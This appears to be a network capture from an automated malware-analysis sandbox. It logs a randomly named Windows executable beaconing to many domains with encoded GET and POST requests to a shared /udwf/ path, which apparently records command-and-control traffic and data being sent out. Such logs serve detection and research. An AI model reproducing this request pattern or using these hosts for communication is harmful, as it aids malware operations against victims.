date: Fri, 10 Nov 2023 08:29:50 GMT
content-type: text/html
content-length: 154
server: NginX
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.10 | 49751 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:29:52.753489017 CET | 274 | OUT | GET /udwf/?G0Yxd2Q=JhD6cx1vDN8a5DTqTeGrmxpVAWwY3peLQFgmtHjEzCHBkXYzNr0CMjFSFUc9xNeYGx9uB9pdck/5lV77OkU8LgPfKC/e4IY5hQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
Host: www.autokit.help
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:29:53.124485970 CET | 275 | IN | HTTP/1.1 200 OK
date: Fri, 10 Nov 2023 08:29:52 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
x-powered-by: PHP/8.1.17
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_MBgXJ0vfoutjDS55Ut5T3/aaqRvbanoWrojKoGdHWZoTN4XR8y1sV5Oq2LsvjUVA2LHmAsYguctyzajZtaubeg==
last-modified: Fri, 10 Nov 2023 08:29:52 GMT
x-cache-miss-from: parking-698fb476bf-xqxcz
server: NginX
connection: close
Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_MBgXJ0vfoutjDS55Ut5T3/aaqRvbanoWrojKoGdHWZoTN4XR8y1sV5Oq2LsvjUVA2LHmAsYguctyzajZtaubeg==><head><meta charset="utf-8"><title>autokit.help&nbsp;-&nbsp;autokit Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="autokit.help is your first and best source for all of the information you’re looking for. From general to


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.10 | 49752 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:29:58.805006027 CET | 305 | OUT | POST /udwf/ HTTP/1.1
Host: www.lxdedu.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.lxdedu.com
Referer: http://www.lxdedu.com/udwf/
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
Connection: close
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:29:59.154952049 CET | 305 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
Date: Fri, 10 Nov 2023 08:29:57 GMT
Connection: close
Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            38 | 192.168.2.10 | 49753 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:30:02.966656923 CET | 307 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojS/fmRAeLSSMN9lHsEWtGXrp5ktSPlfSimD3zxKwZ2vyli6T6rW54oS883zgBEGDX81mbU0L0izfOiMTKYosiQZOhg99oMv+Ee2o+dLA2v0H7yuqbiQjyWd64sj3gAasjMY0pzdc8TK9mm/BwknFJXsZ+lH814xR9e9P8e6DdCXuIsxt25VZnf6pttmM=
                                                                                                                            Nov 10, 2023 09:30:03.322711945 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:30:01 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            39 | 192.168.2.10 | 49754 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:30:05.842101097 CET | 309 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojS/fmRAeLSSMN9lHsEWtGXrp5ktSPlfKimRPzxtsZ3vylh6T/rW5poSk43zsREELX9TqbDQn05jfOtsTPF4s7QZ+lg9toMv+Ee1g+U6A2t0H41uqHpwivWdySsjzwAqMjM4kpxuk8Rq9kh/Bokn4XXsEHlGYT4xp9Po+KEo/3GQrWjClB3TIzP753vi/bhEQaSqi6u7Qsbjo6yTxb+6dBvkyyWwlYhhkQZ8opIsQ0W52sMKw2qA7fyJF7I+PvLRyJ8oglBDpa36O/2dG6IJn/7zHgoFNAOLolw2RAyb9hM7meYJZPJ2ROzIpUaEuRsDoZtFbUH7e22zMXx6qQ8KEAU/PO9I7jT6PvKACGDwviUWik+8gbVodV+a6l7qFHqB2ffO9jZfLOYmUhctrI8eNLKc62Bykl6L3FoxOd2Fo1j2/3v74outQmanrZgSMLKFgvDjsAZbAnHPZeayfKxnQ95CGU5er/6EE5s/MFDe3RjpqxyqcsDsbC2zE26tgHnxxh0GoXcymSLzbp1OKowXD4rKK49mkH90YZylqOnHKSJWdbyycC9gZdGI7WQ7yX5YHxNCKy4cras/WQey8YTn/3A3CqoyBEDnAsPcvxQVsSkmmv+gXqO3gcdR0sJCUMyAKckPgo37U3mXK6Qdiesl0UBDel6ECXgSoRoK+zpfpYNfKVn/LEf1ZuMC/Cc2SIXfCPMepYF4N+csjYY+bPgxDiz5g9owRas3jikr4myA6UuoMrEHcsnWWQT22uZYZtfLHqA21uGHyyByrWna0emtmNqqIZEBYxn/OvmU38W0Dwwo3mWL9dvmo7P0yd5LBW5/39Li48CyjkNEemTU8R0PVDWqlBSDsQa9JA3WKXC/pkXLUgtzyBxGkpdE5R8z1fWwLla6oVMs4Ifjm00qRlHeKotGSqL2CtUd/IFrLBtxthZ12eHLcD5nxOVJWcUWKc58OsfSvLC3byHHw132AxfjnVStHThByxi/gimTfmQ2f8gRDWV/m7S2Pn/kp6akJOHvbwOPck9or9jTqKcPVdPYlx/tXxFvudScIrkw7hbP5r24iPDrKi0AD1mwwEqwMdj+xXI1b676khu3muM8x4lDDc2CbhVwTa921oJ+Bxjgw+GdI4NYDG5pKoKsuEnadUhGHxoPC5sP9eWlf6INUbL3ZVpej4v4e5PTaRmeRtLzRQu6fyld8r
                                                                                                                            Nov 10, 2023 09:30:06.197726965 CET | 310 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:30:04 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            4 | 192.168.2.10 | 49718 | 23.227.38.74 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:27:53.388838053 CET | 101 | OUT | GET /udwf/?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:27:53.617281914 CET | 103 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:53 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            X-Storefront-Renderer-Rendered: 1
                                                                                                                            Location: https://littlehappiez.com/udwf?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1
                                                                                                                            X-Redirect-Reason: https_required
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            Content-Security-Policy: frame-ancestors 'none';
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Vary: Accept
                                                                                                                            powered-by: Shopify
                                                                                                                            Server-Timing: processing;dur=11, db;dur=5, asn;desc="60068", edge;desc="SEA", country;desc="US", pageType;desc="404", servedBy;desc="kpkm", requestID;desc="113f9483-cc9b-4298-a502-d546ed1fa34a"
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            X-Dc: gcp-us-west1,gcp-us-central1,gcp-us-central1
                                                                                                                            X-Request-ID: 113f9483-cc9b-4298-a502-d546ed1fa34a
                                                                                                                            X-Download-Options: noopen
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B%2FjARrOFzBauoLACLG6hSrB3yPh8X4Wq1cLmfvM2rqdXI7QCcSRUe2dLimG160P9PIvSdU2%2B7zLGuiP5V7gRwaJqLwvnWgQ127vLjWFicqv2K
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Nov 10, 2023 09:27:53.617347002 CET | 103 | IN |
                                                                                                                            Data Ascii: d7VjhEVvoARtmwxVcnHNo%2BC5k3ow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=75.999975Server: cloudflareCF-RAY: 823ceb3b2e4808ff-SEA
                                                                                                                            Nov 10, 2023 09:27:53.617383957 CET | 103 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            40 | 192.168.2.10 | 49755 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:30:08.715059042 CET | 311 | OUT | GET /udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:30:09.068584919 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:30:07 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            41 | 192.168.2.10 | 49756 | 8.212.101.233 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:30:15.396548986 CET | 313 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.iwhrkc.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.iwhrkc.shop
                                                                                                                            Referer: http://www.iwhrkc.shop/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=jY+/EcdNU8MgTohtdjwQyKiWqw+C+lOTnAktCK3IAwrhWjIoH7b4/ICs1ZSCuB7xtKD5nD1bB7666Qsr8bywNEXYCSC4v7ZM6Sj1LDm2/sYa/rr3gf90KT5F7puV1qP8iXikEaHnR/I308RoPerwV3qLKGATeYW3DcqlMEhw8TskrN6ehA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.10 | 49758 | 8.212.101.233 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:30:20.766788006 CET | 315 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.iwhrkc.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.iwhrkc.shop
                                                                                                                            Referer: http://www.iwhrkc.shop/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.10 | 49759 | 8.212.101.233 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:30:23.617130041 CET | 316 | OUT | GET /udwf/?G0Yxd2Q=uaWfHshIK9gqRIt0eR4Tz5qfjwC0uWvEtBcNKoa2GFPJfFEePrXngeKx3tr3rBy7nKvOiQo6TdyP9ywL+/2JVArzIS+tipxZpg==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.iwhrkc.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.10 | 49760 | 103.120.80.111 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:30:30.097944021 CET | 317 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.633922.com
                                                                                                                            Referer: http://www.633922.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=JiASbP8HN86Rz6TJclmxS7nH+2R38M+JbrJF5PSYiaemn97m+uwPW96+/doY3sglkdjitjzbO+bRgduD0iHKtwcxM4lgpKoX7IkwCRQeIMV2LhFVbp1ccGx3r0C/cLU+TycbjIjCATY9xuzIWdfiesnwsvtKbDSvBsho4aIp+9IyuWsIfA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.10 | 49761 | 103.120.80.111 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:30:32.952136040 CET | 318 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.633922.com
                                                                                                                            Referer: http://www.633922.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=JiASbP8HN86R87DJeEmxCrnEyWR33s+NbrFF5KyIio6mndLm/qEPV96+39odzsg7kdvEtmTbO+fRgc+D0THLsgckHYlujqoX7IkwCQ0kIMt2MStVJcBDUmx0s0C/WrUlTydOjISfARQ9xvDIWOHjXsn2jPsibxz1FeJr8vsnltlSmjAbY6wlqPFtpCYtxEXgaxqB0+k=


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.10 | 49762 | 103.120.80.111 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:30:36.963881016 CET | 321 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.633922.com
                                                                                                                            Referer: http://www.633922.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.10 | 49763 | 103.120.80.111 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:30:39.818058014 CET | 321 | OUT | GET /udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:30:40.146688938 CET | 322 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: wts/1.7.0
                                                                                                                            Date: Fri, 10 Nov 2023 08:31:41 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            ETag: "64daefaa-1a1c"
                                                                                                                            Data Ascii: 1a22<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>633922.com-(www.west.cn)</title> <meta name="description" content="wifi123.online," /> <meta name="keywords" content
Nov 10, 2023 09:30:40.146724939 CET | 323 | IN |
                                                                                                                            Data Ascii: ="wifi123.online," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, t
                                                                                                                            Nov 10, 2023 09:30:40.146760941 CET | 323 | IN
                                                                                                                            Data Ascii: color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } html, body { height: 100%; } html, body,
                                                                                                                            Nov 10, 2023 09:30:40.146795988 CET | 324 | IN
                                                                                                                            Data Ascii: td, fieldset { margin: 0; padding: 0; } .wrap { margin: 0px auto; min-width: 990px; max-width: 1190px } .
                                                                                                                            Nov 10, 2023 09:30:40.146828890 CET | 324 | IN
                                                                                                                            Data Ascii: padding: 0 0 20px 0 } .orangebtn { background-color: #ff8400; display: inline-block; padding: 0px 20px; color: #fff; height: 50px; li
                                                                                                                            Nov 10, 2023 09:30:40.146862030 CET | 325 | IN
                                                                                                                            Data Ascii: 48px; color: #feff07; font-family: Tahoma, sans-serif; padding: 60px 0 20px 0 } .banner1 p { color: #fff; font-size: 20px; }
                                                                                                                            Nov 10, 2023 09:30:40.146893978 CET | 326 | IN
                                                                                                                            Data Ascii: 100%; margin-right: 320px; font-size: 16px } .domainout { padding: 50px 380px 50px 100px } .domainout p { line-height: 50px; }
                                                                                                                            Nov 10, 2023 09:30:40.146927118 CET | 326 | IN
                                                                                                                            Data Ascii: .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color: #fff; padding: 0px 20px
                                                                                                                            Nov 10, 2023 09:30:40.146960020 CET | 327 | IN
